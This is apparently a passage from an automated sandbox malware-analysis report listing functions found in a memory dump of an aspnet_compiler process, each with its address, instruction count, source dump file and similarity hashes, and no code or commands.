                                                      • Opcode ID: ec29ff20a420604ec4e84a05387630c491e077829d3783be6f4b1af4b0dd4502
                                                      • Instruction ID: 6576a8499254044ee59ac96814da37d4754a397787b4df1795bb28910af092de
                                                      • Opcode Fuzzy Hash: ec29ff20a420604ec4e84a05387630c491e077829d3783be6f4b1af4b0dd4502
                                                      • Instruction Fuzzy Hash: EF116935A0020DABCF15EFA4C951BAE7BB5EB49690F108099FA059B290DB35EE11CB94
                                                      Function 01AAC020 Relevance: .0, Instructions: 49COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                      • Instruction ID: e1066d2da7e12301032437bf06a2ec36c97544314fd9cf2b8159185d80423d50
                                                      • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                      • Instruction Fuzzy Hash: 3201D8321407059FEB27A6A9C900FA77BF9FFC5660F44885DE9468B580EB71E401CB50
                                                      Function 01AEE5CF Relevance: .0, Instructions: 49COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bab9807c4e33fdc0a416ff34fd3cb56827a9e8efc8d6c6101565f97d5bc5cce2
                                                      • Instruction ID: 33858f613b76142f1649b7d69a4e38377a03a7652a2971cc6b31d9c25cfa3386
                                                      • Opcode Fuzzy Hash: bab9807c4e33fdc0a416ff34fd3cb56827a9e8efc8d6c6101565f97d5bc5cce2
                                                      • Instruction Fuzzy Hash: FF01F7B2200915BFC315AB39CE40F57B7ACFF55A54B04062AF10983561DB24EC01C6E0
                                                      Function 01B469C0 Relevance: .0, Instructions: 49COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2cb4329d9ed9ed9d49e2957f61574c87b3a42c830d2354c7ba65a5ea32b0778c
                                                      • Instruction ID: c1c1c341161d70f045ef4e52cdc3fc290c6bdaa6f7499fda70bb6d6d08d34f05
                                                      • Opcode Fuzzy Hash: 2cb4329d9ed9ed9d49e2957f61574c87b3a42c830d2354c7ba65a5ea32b0778c
                                                      • Instruction Fuzzy Hash: AC014C322147069BC324DF69D888AB7BBA8FF49720F118269F95887280E7309901C7D1
                                                      Function 01B3C460 Relevance: .0, Instructions: 48COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d34ef8c34894e8fcea4411a8812bafd1f1ce75d2699e6290289bd432ab3c4ff3
                                                      • Instruction ID: 9ab870762a26b1b9bed6a0015779d704c8c1ca93c2e2fa82f8779758f161e5fc
                                                      • Opcode Fuzzy Hash: d34ef8c34894e8fcea4411a8812bafd1f1ce75d2699e6290289bd432ab3c4ff3
                                                      • Instruction Fuzzy Hash: 9E115B71A00209ABDF19EFA8C944EAE7BB5EB88340F00409AF901A7340DB35E921CB90
                                                      Function 01B3C97C Relevance: .0, Instructions: 48COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1854351d653de76c0d86e9b162a03880bf07c60cf211ed600335e483f924fa97
                                                      • Instruction ID: 8b7f8cc84623179d2382d77a53bd6ac88dbf9c2b3ea75ecf6926b3efad7c34e8
                                                      • Opcode Fuzzy Hash: 1854351d653de76c0d86e9b162a03880bf07c60cf211ed600335e483f924fa97
                                                      • Instruction Fuzzy Hash: 1D115A716043049FC700DF69C54195BBBE4EF98610F00855EBA98D7350D730E900CB92
                                                      Function 01B84A80 Relevance: .0, Instructions: 48COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                                                      • Instruction ID: e054c0a4c7f0f68ea82bc2330bf85612fae34e8f6808b29ed749df15fd4be41d
                                                      • Opcode Fuzzy Hash: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                                                      • Instruction Fuzzy Hash: 1001D8362006029FDB29AB69D844F96FBE6FFC5B10F044859E6428F650DB70F840C754
                                                      Function 01B3CA11 Relevance: .0, Instructions: 48COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f14ee4b397cc38ab48517656318bba099f1c718c817c1cf4260cc55d883d8840
                                                      • Instruction ID: 8052e4026bc7e94a22fbd231d045861597a1116ad83f6647eec4635eb25531b9
                                                      • Opcode Fuzzy Hash: f14ee4b397cc38ab48517656318bba099f1c718c817c1cf4260cc55d883d8840
                                                      • Instruction Fuzzy Hash: 2E1157B16083089FC700DFA9C541A5BBBE4EF99750F00895EBA58D73A4E630E901CB92
                                                      Function 01ACE016 Relevance: .0, Instructions: 46COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                      • Instruction ID: ae2064a5e461c082fbb5e5000f47ad5058c47ae2aecfd23a1536ade11c0063bb
                                                      • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                      • Instruction Fuzzy Hash: 72017C322406809FE32B971DC988F267FE8EF44B64F0D44A5F909CB6E2DB68DC40C661
                                                      Function 01AA826B Relevance: .0, Instructions: 46COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 787fb9c87e9253e534c27823701390d17086aaaa45d3c71c1a20ea3f78cae4e4
                                                      • Instruction ID: 5d87698b5b7d43e3e5a54bda64add9d0c5289abcef7703ac860def5b8b214ef4
                                                      • Opcode Fuzzy Hash: 787fb9c87e9253e534c27823701390d17086aaaa45d3c71c1a20ea3f78cae4e4
                                                      • Instruction Fuzzy Hash: 6D01F771B00505EBCB18EBA9DD44ABFBBF8FF84210B854069D901A7280DF30DC05C290
                                                      Function 01B5EB50 Relevance: .0, Instructions: 46COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 34a76d15b4743d01b6beb87943271fe592ba15adf6562efa52555ee73de77377
                                                      • Instruction ID: 435565ec1ce870b010a73187ede361f8ccac714bdcfc5ed784b80467598e6492
                                                      • Opcode Fuzzy Hash: 34a76d15b4743d01b6beb87943271fe592ba15adf6562efa52555ee73de77377
                                                      • Instruction Fuzzy Hash: B601DFB1684602AFD3395B19D941F12FAA8EF54B90F00046EF60A8B3A0C7B0D8408B94
                                                      Function 01AB2582 Relevance: .0, Instructions: 45COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2dd7b027fd81957f91bd464b65c9bb19262f62602576c7c11f11d595bf5c82da
                                                      • Instruction ID: 29d4b93ffa6b2eadd187ead78b661d397bdfca92e7d88b47b420fdfe2ab15b70
                                                      • Opcode Fuzzy Hash: 2dd7b027fd81957f91bd464b65c9bb19262f62602576c7c11f11d595bf5c82da
                                                      • Instruction Fuzzy Hash: 4EF0F932741650B7C7319B568D80F577EAEEF84E90F04456AB60597641C634ED01CAA0
                                                      Function 01ADC073 Relevance: .0, Instructions: 43COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                      • Instruction ID: 4425d0a935547de773268d0a3f31089e16e2e3d7e80cf31dcbff4c6d93f4feab
                                                      • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                      • Instruction Fuzzy Hash: 19F0C2B2A00A11ABD324CF4DDD40E57FBEADBD1AA0F04812CF605C7220EA31ED04CB90
                                                      Function 01AAC310 Relevance: .0, Instructions: 43COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                      • Instruction ID: b5e55eddf89b10c4abe2530462d18b56c0c04d34ab6e6e0eb859fec4f71a895c
                                                      • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                      • Instruction Fuzzy Hash: 5DF0FC732046239FF732576D8940B6BE9A58FD5A74F590039E2059B248CB608D0157E0
                                                      Function 01B8634F Relevance: .0, Instructions: 43COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2d394b407daaf7477c74ab18ae182cda50667491b813a6acdc81e033999aa0f9
                                                      • Instruction ID: 6cc5609b8f7a3d7f4813944d86b19fd086532dca9a1592d00a95e2a715883223
                                                      • Opcode Fuzzy Hash: 2d394b407daaf7477c74ab18ae182cda50667491b813a6acdc81e033999aa0f9
                                                      • Instruction Fuzzy Hash: F6014F71A10609EFDB04DFA9D591AAEB7F8FF58704F10406AFA14E7350D7749A01CBA4
                                                      Function 01B862D6 Relevance: .0, Instructions: 43COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a560cb13660615b29e490ed3df2b17babdfeecbe2f5aeb27e62b1cd0d5bd317a
                                                      • Instruction ID: e57df565b5422ab541c559a5a779cd33485e2580cb4d119176b770ee680c80ff
                                                      • Opcode Fuzzy Hash: a560cb13660615b29e490ed3df2b17babdfeecbe2f5aeb27e62b1cd0d5bd317a
                                                      • Instruction Fuzzy Hash: 1D012171A0020AABDB04DFA9D541AAEB7F8EF58704F50805AFA14E7350D7749D01CBA4
                                                      Function 01B8625D Relevance: .0, Instructions: 43COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 43e13fa391c82d0abbabdcac75efcd528c53780963c68e4d71890ebbc571abb3
                                                      • Instruction ID: e1b8ea296d64ad2ba0be206c2633b38807dbdf8afd350bcb6eb48e6a9f1d2671
                                                      • Opcode Fuzzy Hash: 43e13fa391c82d0abbabdcac75efcd528c53780963c68e4d71890ebbc571abb3
                                                      • Instruction Fuzzy Hash: 7F017171A00209EBCB04DFA9D541AAEB7F8EF58700F10805AF900E7350D7749901CBA0
                                                      Function 01AECA6F Relevance: .0, Instructions: 42COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                      • Instruction ID: ff7ce0ae48d295434f5a2f39e46b1acc943d0b663022ba408bfd9e72da1c86fb
                                                      • Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                      • Instruction Fuzzy Hash: 2901F4322006959BD727A71DD809F99BBD9EF51764F0D84A5FA188B6A2D779C800C250
                                                      Function 01B861E5 Relevance: .0, Instructions: 41COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f46125d70e6b33ee873711a29abfb0867dd6b34b4d872141c385d5d07878d5b5
                                                      • Instruction ID: b75ed1a9a4fcdbe7a2cdd3beb165407f961701c94c2990cd7ec2a3285b5f80f0
                                                      • Opcode Fuzzy Hash: f46125d70e6b33ee873711a29abfb0867dd6b34b4d872141c385d5d07878d5b5
                                                      • Instruction Fuzzy Hash: D0014F71A002499BDB04DFA9D545AEEBBF8FF58710F14409AF501E7290D774EA01CB94
                                                      Function 01B363C0 Relevance: .0, Instructions: 41COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                      • Instruction ID: fc8ec70ed4527978fb2e24cd167baebbf654681f834adc52c56b6ccd024ac06a
                                                      • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                      • Instruction Fuzzy Hash: F1F0F97220001DBFEF019F94DE81DAF7B7EEB99698B104165BA11A2160D631DE21ABA0
                                                      Function 01B3A4B0 Relevance: .0, Instructions: 40COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3a13363256076030066465af8af16d23fdf67041c17946fe184f41ab319376fc
                                                      • Instruction ID: 38fd4a71abe97810230fcb42041f515fd608754ae1e61bb439c2795cc7daa661
                                                      • Opcode Fuzzy Hash: 3a13363256076030066465af8af16d23fdf67041c17946fe184f41ab319376fc
                                                      • Instruction Fuzzy Hash: D6019A36100209ABCF129F94DC40EDE3F66FB4C754F068141FE19A6260C332E970EB81
                                                      Function 01AAC0F0 Relevance: .0, Instructions: 39COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9f2a64351149b2ab7a9959bee64be59dee701b31a9fd45df8654a09491b4328c
                                                      • Instruction ID: 2a4a6d097bcd15642b428ad58ac429ece5cd26b4dc4bc17f2846d45058895d15
                                                      • Opcode Fuzzy Hash: 9f2a64351149b2ab7a9959bee64be59dee701b31a9fd45df8654a09491b4328c
                                                      • Instruction Fuzzy Hash: B8F024713043415BF758A7699C01B2236AAE7C0760FA9806AEB098F6C5FB70EC0183A4
                                                      Function 01AE656A Relevance: .0, Instructions: 39COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4c9987afd5b4ee7033785cebeec2142955ffb7f1a7c8c68b1f6b751b68169759
                                                      • Instruction ID: b1b4d82442dc111e697f802f1f72549cd0661442d0fb8c4e89c67e933b8532f4
                                                      • Opcode Fuzzy Hash: 4c9987afd5b4ee7033785cebeec2142955ffb7f1a7c8c68b1f6b751b68169759
                                                      • Instruction Fuzzy Hash: EB01A4703006819BE737977CCD4CF653BE4FF50B00F4949A4FA498BAD6D728D8018620
                                                      Function 01B5437C Relevance: .0, Instructions: 37COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                      • Instruction ID: ca13e1490ca86c7d828e4094b0b41e5341e8f350906be47d008058b38f53a640
                                                      • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                      • Instruction Fuzzy Hash: 9AF02E31741D1347EBBDAB2E8554B2FA696DF90D40B0505BC9D01CB661FF20DC80C790
                                                      Function 01B3C89D Relevance: .0, Instructions: 36COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8936586de897729c6913216b9acbad25a454c64977e90ad0e555a2abd61edffc
                                                      • Instruction ID: d786fdaef61af0ee487ced8df243d343aa3c9a9cbd6d27174873029ef63571a1
                                                      • Opcode Fuzzy Hash: 8936586de897729c6913216b9acbad25a454c64977e90ad0e555a2abd61edffc
                                                      • Instruction Fuzzy Hash: CBF0AF716053049FC714EF68C542A2BBBE4FF98710F408A5EB998DB390E734EA01C796
                                                      Function 01B3E872 Relevance: .0, Instructions: 36COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                      • Instruction ID: 2a17cac4db121086e1114bce96f12295545dbd35495dfeb550768074bd640ae8
                                                      • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                      • Instruction Fuzzy Hash: C3F08933F155129BD7359A4DCC80F56B768EFD5A60F1901AAAA04AB260C760FC11C7D0
                                                      Function 01AE0854 Relevance: .0, Instructions: 35COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                      • Instruction ID: 74ee4ee5d8c36a1d169f5c13fc737b5611a0b0cc6cfb9daeb7a3a518b0e4f834
                                                      • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                      • Instruction Fuzzy Hash: F0F0BE72710205AFE725DB25CE05F96B6F9EFA8740F148478E949D72A0FAB0EE01C694
                                                      Function 01B3C912 Relevance: .0, Instructions: 34COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9f067f6cbbd03b2f1e859e5a7262725088c41922f76633e1366cb8f7871bb229
                                                      • Instruction ID: 097cb3df08b7ba51ed733466678be37f31ba9c99fa3dbcd9911826b156b830ce
                                                      • Opcode Fuzzy Hash: 9f067f6cbbd03b2f1e859e5a7262725088c41922f76633e1366cb8f7871bb229
                                                      • Instruction Fuzzy Hash: BBF06270A01249DFCB04EFA9C655AAEBBF4FF58300F00815AB955EB385DA34EE01CB54
                                                      Function 01AB47FB Relevance: .0, Instructions: 33COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 82e77a36450c5a10569d07c6686f59d2d1c576e370768cb9c9d8b49a418a9078
                                                      • Instruction ID: 90352160b5b5464e19f750485883f82f929fea790cdb03ba893afdea01f5285c
                                                      • Opcode Fuzzy Hash: 82e77a36450c5a10569d07c6686f59d2d1c576e370768cb9c9d8b49a418a9078
                                                      • Instruction Fuzzy Hash: 76F0B4319166E19FE733DBECC5C4BA17BECEB08A30F08496AE58B87543C724D880C691
                                                      Function 01B70115 Relevance: .0, Instructions: 32COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ec3f921088fe0663ba2b56003d0276aa2ec916b3642012a417cc8975196f6873
                                                      • Instruction ID: 880463b52ff77a02bf1fe0c70d480aa3d37b0d5583caefc075886aa728b65b3d
                                                      • Opcode Fuzzy Hash: ec3f921088fe0663ba2b56003d0276aa2ec916b3642012a417cc8975196f6873
                                                      • Instruction Fuzzy Hash: CAF05CAB4196C00ACF3A7B3C74613D16F58E767210F4D20CAF5B157605C7788483C320
                                                      Function 01AEC5ED Relevance: .0, Instructions: 31COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4610be2f12dab9c5fd3fea4047cc1ba81d560ce57da4c21b530f2949171d116b
                                                      • Instruction ID: 31c2ed3ed1f41a0762788d3554dadf1cba1ae5027cfd39471724e31053b488e1
                                                      • Opcode Fuzzy Hash: 4610be2f12dab9c5fd3fea4047cc1ba81d560ce57da4c21b530f2949171d116b
                                                      • Instruction Fuzzy Hash: 51F0E2715156919FE722971CC14CB23BBE49B81BB1F08B465D40A87556C364E880CE50
                                                      Function 01AF2619 Relevance: .0, Instructions: 31COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                      • Instruction ID: 0d8bdd64d85ae9d0966481ae6bc62ee28c29eaef477f442586840ae2cc8b666c
                                                      • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                      • Instruction Fuzzy Hash: FFE0D8723006016BE7119F998DC0F477B6EDFD6B10F04007EB6045F251CAE2DC0986A4
                                                      Function 01B46030 Relevance: .0, Instructions: 29COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
